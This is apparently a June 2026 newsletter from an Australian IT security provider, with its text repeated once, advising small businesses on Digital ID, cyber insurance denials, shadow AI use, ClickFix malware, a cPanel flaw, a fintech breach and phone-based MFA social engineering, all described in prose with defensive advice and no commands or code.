New identity technology is arriving, staff are adopting AI tools without telling IT, and attackers have added phone calls to a social engineering toolkit that no longer relies on email.
There is genuine good news in this edition, and the common thread through both the threats and the opportunities is the same: knowing what is happening inside your own business before something goes wrong.
A government identity milestone, an uncomfortable insurance reality, and the AI tools no one in IT knows about
Australia's Digital ID Is Opening to Private Sector Businesses from Late 2026
Australia's Digital ID system has 15 million myIDs and has processed 80 million verifications across 246 government services. From December 2026, accredited private sector providers and entities will be able to apply to participate in the system. Law firms and accounting firms will then have a way to verify client identity without collecting and holding physical copies of passports and driver's licences.
The government's myID platform lets individuals verify their identity once through a government-accredited provider, then share a cryptographic confirmation rather than a physical document. AML/CTF guidance is being updated to allow Digital ID to be used to meet Know-Your-Customer requirements, making this directly relevant to professional services firms with client due diligence obligations.
Businesses that begin assessing Digital ID readiness now will be ahead when applications open. The registration of interest form is already live at digitalidsystem.gov.au.
What to do next
Register your interest at digitalidsystem.gov.au, where the system administrator will contact you with further information ahead of the opening.
Ask your IT provider how Digital ID could integrate with your client onboarding processes.
Review your current document collection practices and consider where Digital ID reduces your exposure.
Why Cyber Insurance Claims Are Being Denied More Often
Industry commentary suggests insurers are now denying more than 40% of cyber insurance claims. In many denied-claim scenarios, the issue is not whether the breach happened, but whether the business can prove the controls declared on the application were in place and maintained.
Cyber insurance is now a warranty arrangement, not a safety net. If a claim is made and the controls declared on the application are not in place, the insurer rejects it regardless of the damage caused.
Industry analysis suggests MFA failure accounts for around 37% of rejected claims, typically from businesses that ticked "yes" on the application without enforcing Multi-Factor Authentication (MFA) consistently across all their systems. As the Jam Cyber team sees it in practice: IT and cyber are no longer set and forget. A policy issued on last year's declared controls may not pay out if those controls are not actively maintained today.
What to do next
Review your cyber insurance application and confirm every declared control is genuinely in place today.
Ask your IT provider for written confirmation of MFA coverage across all systems, not just email.
Schedule a backup restoration test and document the result, as insurers increasingly treat a completed test as required evidence rather than a declaration.
Shadow IT and AI: The Tools No One in IT Knows About
Staff are using AI tools to build, design, and automate without telling IT. There is no approval process, no governance, and no visibility into what data those platforms are handling or where it ends up.
Platforms like Canva AI, ChatGPT, and Notion AI let a non-technical staff member build a client portal or process a database of client records in an afternoon, with no IT involvement. The risk is not always deliberate. A paralegal running client data through an AI summariser is not trying to cause a breach, but processing personal information through an external platform with no data processing agreement may create a privacy or security issue that needs formal breach assessment.
According to CPA Australia, 71% of Australian businesses plan to increase their use of AI in 2026. The ACSC guidance for small businesses is clear that governance needs to keep pace with adoption.
What to do next
Ask your IT provider to conduct a shadow IT audit to identify which cloud tools and AI platforms are currently active across the business.
Establish a simple, fast approval process so staff can get a decision quickly rather than bypassing IT because it is too slow.
Check whether any AI-generated outputs used in client work were produced using data fed into an external platform.
Two active ACSC advisories, a major Australian fintech breach, and an attack that bypasses many of the controls you rely on
ACSC Warns of ClickFix Malware Campaign Targeting Australian Networks
Fake verification prompts on compromised Australian websites are tricking staff into installing credential-stealing malware. It can bypass some preventative controls once a user follows the instructions, and no malicious email is required.
The ACSC confirmed on 7 May 2026 that attackers have injected legitimate Australian WordPress websites with code that displays fake Cloudflare or CAPTCHA prompts. Visitors are told to copy a command into their Windows computer to verify they are human, and that command installs Vidar Stealer, which silently harvests saved passwords and session tokens from the infected device.
Critical Website Hosting Flaw Actively Exploited Across Australia
Attackers exploited a pre-authentication bypass flaw in cPanel and WHM, the hosting control panel software managing an estimated 70 million domains. Reporting indicates exploitation may have occurred before public disclosure or patch availability, with hosting and managed hosting providers among the reported entry points into client systems.
The ACSC issued a critical alert on 1 May 2026 about CVE-2026-41940, which lets attackers take full administrative control of a hosting account without a password. Businesses relying on an external provider to manage their website may have been indirectly exposed even if they had no direct awareness of the vulnerability.
What to do next
Ask your hosting or IT provider to confirm the cPanel/WHM patch from late April 2026 has been applied.
Change administrative passwords for your hosting control panel and connected accounts as a precaution.
YouX Fintech Breach: A Threat Actor Claims 229,000 Australian Driver's Licences Exposed
A threat actor claimed to have obtained an estimated 229,000 Australian driver's licence numbers along with loan-application data and other personal information from Australian fintech YouX, and demanded payment to stop the release of stolen records.
229,000Driver's licences claimed by threat actor in the YouX breach (9News)
7,740Organisations affected by ransomware globally in 2025 (Sophos, via SMBtech)
59%Of Australian NDB notifications involved malicious attacks (OAIC, Jan-Jun 2025)
Professional services firms and technology businesses holding financial or identity data are high-value ransomware targets. That data is directly tied to individual identity and credit, making it valuable to attackers and serious for affected clients.
What to do next
Confirm your business has tested, current backups that allow recovery without paying a ransom.
Verify your IT provider is actively monitoring your environment for unauthorised access.
Attackers Are Now Calling Your Staff Pretending to Be from IT Support
A live technique targeting Australian organisations floods a staff member with MFA push notification requests, then follows up with a phone call from someone posing as IT support. The ACSC has issued a specific advisory on this approach, and it works through people rather than systems.
The caller instructs the staff member to run a small "mailbox fix tool" to resolve the MFA problem, and that tool is malware. Once run, the attacker has access.
The ACSC's Scattered Spider advisory documents this exact pattern: phone-based IT impersonation, push-bombing to create confusion, and social engineering to get a user to run a remote access or fix tool.
What to do next
Tell staff never to run a tool at the instruction of someone who called them, even if the caller claims to be from IT.
Set up a simple verification rule: hang up and call back on a known IT number before taking any action.
Tell staff that an unexpected flood of MFA notifications signals an active attack: report it immediately and approve nothing.
One compliance deadline landing in weeks, and one technology question worth asking your IT provider today
Lawyers and Accountants: New Privacy Act Obligations from 1 July 2026
Under AML/CTF reforms taking effect on 1 July 2026, firms that become AML/CTF reporting entities because they provide designated services will need to comply with Privacy Act obligations for how they handle AML/CTF-related personal information, even if they are under the usual $3 million small-business exemption threshold.
What this means for your business
This applies to legal practitioners, conveyancers, and accounting firms providing designated services under the updated AML/CTF Act. For practices that have operated under the assumption that privacy law does not apply to them, this is a real change. At a minimum, it means knowing what personal information the firm holds for AML/CTF purposes, having a documented breach response process, and understanding the OAIC's reporting requirements.
The broader Tranche 2 Privacy Act reforms, expected during 2026 or 2027, may extend obligations more widely, so firms not caught by 1 July should still be building readiness now.
AI-Powered Security Is Already Built Into Software Most SMEs Are Paying For
Many businesses on Microsoft 365 Business Premium are already paying for Defender for Business, which includes AI-powered endpoint protection, endpoint detection and response, and automated investigation and remediation. In our experience, many businesses have not fully enabled or monitored it.
What this means for your business
If your IT provider has not discussed Defender for Business with you, ask directly whether it is deployed and whether someone is actively reviewing the alerts it generates. The capability is already included in what you are paying for. Businesses on lower Microsoft 365 tiers or on Google Workspace can get equivalent protection through standalone products now priced accessibly for SMEs.
Did You Know?
AI Integration: Questions Most Businesses Have Not Yet Answered
Most Australian businesses are somewhere on a spectrum with AI integration. The questions being asked most often are not about which tool to use. They are about what boundaries to set, what risks to understand, and whether the business is set up to use these tools without exposing client data.
The Jam Cyber team is working out what practical support for businesses navigating AI integration looks like. If this is something you are thinking through, we would welcome a conversation.
🤔
What questions should you be asking?
Most businesses do not know where to start with AI and data governance. We can help frame the right questions.
🔒
Where does your client data go?
Cloud AI platforms process data externally. Understanding the implications is the first step to managing the risk.
📋
What does a workable policy look like?
A practical AI usage policy needs to be clear, realistic, and understood by your team.
💬
Start the conversation
No commitment, no hard sell. Just a frank discussion about what a sensible approach looks like.
New tools and new attack techniques are arriving at the same time. The businesses navigating this well are not the ones with the largest budgets.
They are the ones asking better questions of their IT providers, reviewing their positions with clear eyes, and treating each new development as something to act on rather than file away.
Ready to take the next step?
Let's Talk About Where Your Business Stands
No jargon, no hard sell. Just a clear, honest picture of your cyber security and IT — and what to do about it.
More than 20 years protecting Australian businesses
Not a single fully protected client has been breached since 2017
Jam Cyber Brief
June 2026 Edition
New identity technology is arriving, staff are adopting AI tools without telling IT, and attackers have added phone calls to a social engineering toolkit that no longer relies on email.
There is genuine good news in this edition, and the common thread through both the threats and the opportunities is the same: knowing what is happening inside your own business before something goes wrong.
In this edition
IT & Cyber Trends We Are Seeing Right Now
A government identity milestone, an uncomfortable insurance reality, and the AI tools no one in IT knows about
Australia's Digital ID Is Opening to Private Sector Businesses from Late 2026
The government's myID platform lets individuals verify their identity once through a government-accredited provider, then share a cryptographic confirmation rather than a physical document. AML/CTF guidance is being updated to allow Digital ID to be used to meet Know-Your-Customer requirements, making this directly relevant to professional services firms with client due diligence obligations.
Businesses that begin assessing Digital ID readiness now will be ahead when applications open. The registration of interest form is already live at digitalidsystem.gov.au.
What to do next
Why Cyber Insurance Claims Are Being Denied More Often
Cyber insurance is now a warranty arrangement, not a safety net. If a claim is made and the controls declared on the application are not in place, the insurer rejects it regardless of the damage caused.
Industry analysis suggests MFA failure accounts for around 37% of rejected claims, typically from businesses that ticked "yes" on the application without enforcing Multi-Factor Authentication (MFA) consistently across all their systems. As the Jam Cyber team sees it in practice: IT and cyber are no longer set and forget. A policy issued on last year's declared controls may not pay out if those controls are not actively maintained today.
What to do next
Shadow IT and AI: The Tools No One in IT Knows About
Platforms like Canva AI, ChatGPT, and Notion AI let a non-technical staff member build a client portal or process a database of client records in an afternoon, with no IT involvement. The risk is not always deliberate. A paralegal running client data through an AI summariser is not trying to cause a breach, but processing personal information through an external platform with no data processing agreement may create a privacy or security issue that needs formal breach assessment.
According to CPA Australia, 71% of Australian businesses plan to increase their use of AI in 2026. The ACSC guidance for small businesses is clear that governance needs to keep pace with adoption.
What to do next
Current Cyber Threats for Australian SMEs
Two active ACSC advisories, a major Australian fintech breach, and an attack that bypasses many of the controls you rely on
ACSC Warns of ClickFix Malware Campaign Targeting Australian Networks
The ACSC confirmed on 7 May 2026 that attackers have injected legitimate Australian WordPress websites with code that displays fake Cloudflare or CAPTCHA prompts. Visitors are told to copy a command into their Windows computer to verify they are human, and that command installs Vidar Stealer, which silently harvests saved passwords and session tokens from the infected device.
Read the full ACSC ClickFix advisory for technical details.
What to do next
Critical Website Hosting Flaw Actively Exploited Across Australia
The ACSC issued a critical alert on 1 May 2026 about CVE-2026-41940, which lets attackers take full administrative control of a hosting account without a password. Businesses relying on an external provider to manage their website may have been indirectly exposed even if they had no direct awareness of the vulnerability.
What to do next
YouX Fintech Breach: A Threat Actor Claims 229,000 Australian Driver's Licences Exposed
Professional services firms and technology businesses holding financial or identity data are high-value ransomware targets. That data is directly tied to individual identity and credit, making it valuable to attackers and serious for affected clients.
What to do next
Attackers Are Now Calling Your Staff Pretending to Be from IT Support
The caller instructs the staff member to run a small "mailbox fix tool" to resolve the MFA problem, and that tool is malware. Once run, the attacker has access.
The ACSC's Scattered Spider advisory documents this exact pattern: phone-based IT impersonation, push-bombing to create confusion, and social engineering to get a user to run a remote access or fix tool.
What to do next
Things to Keep on the Radar
One compliance deadline landing in weeks, and one technology question worth asking your IT provider today
Lawyers and Accountants: New Privacy Act Obligations from 1 July 2026
What this means for your business
This applies to legal practitioners, conveyancers, and accounting firms providing designated services under the updated AML/CTF Act. For practices that have operated under the assumption that privacy law does not apply to them, this is a real change. At a minimum, it means knowing what personal information the firm holds for AML/CTF purposes, having a documented breach response process, and understanding the OAIC's reporting requirements.
The broader Tranche 2 Privacy Act reforms, expected during 2026 or 2027, may extend obligations more widely, so firms not caught by 1 July should still be building readiness now.
AI-Powered Security Is Already Built Into Software Most SMEs Are Paying For
What this means for your business
If your IT provider has not discussed Defender for Business with you, ask directly whether it is deployed and whether someone is actively reviewing the alerts it generates. The capability is already included in what you are paying for. Businesses on lower Microsoft 365 tiers or on Google Workspace can get equivalent protection through standalone products now priced accessibly for SMEs.
Did You Know?
AI Integration: Questions Most Businesses Have Not Yet Answered
Most Australian businesses are somewhere on a spectrum with AI integration. The questions being asked most often are not about which tool to use. They are about what boundaries to set, what risks to understand, and whether the business is set up to use these tools without exposing client data.
The Jam Cyber team is working out what practical support for businesses navigating AI integration looks like. If this is something you are thinking through, we would welcome a conversation.
What questions should you be asking?
Most businesses do not know where to start with AI and data governance. We can help frame the right questions.
Where does your client data go?
Cloud AI platforms process data externally. Understanding the implications is the first step to managing the risk.
What does a workable policy look like?
A practical AI usage policy needs to be clear, realistic, and understood by your team.
Start the conversation
No commitment, no hard sell. Just a frank discussion about what a sensible approach looks like.
Get in Touch →
Final Thoughts
New tools and new attack techniques are arriving at the same time. The businesses navigating this well are not the ones with the largest budgets.
They are the ones asking better questions of their IT providers, reviewing their positions with clear eyes, and treating each new development as something to act on rather than file away.
Ready to take the next step?
Let's Talk About Where Your Business Stands
No jargon, no hard sell. Just a clear, honest picture of your cyber security and IT — and what to do about it.
Recent Posts
Categories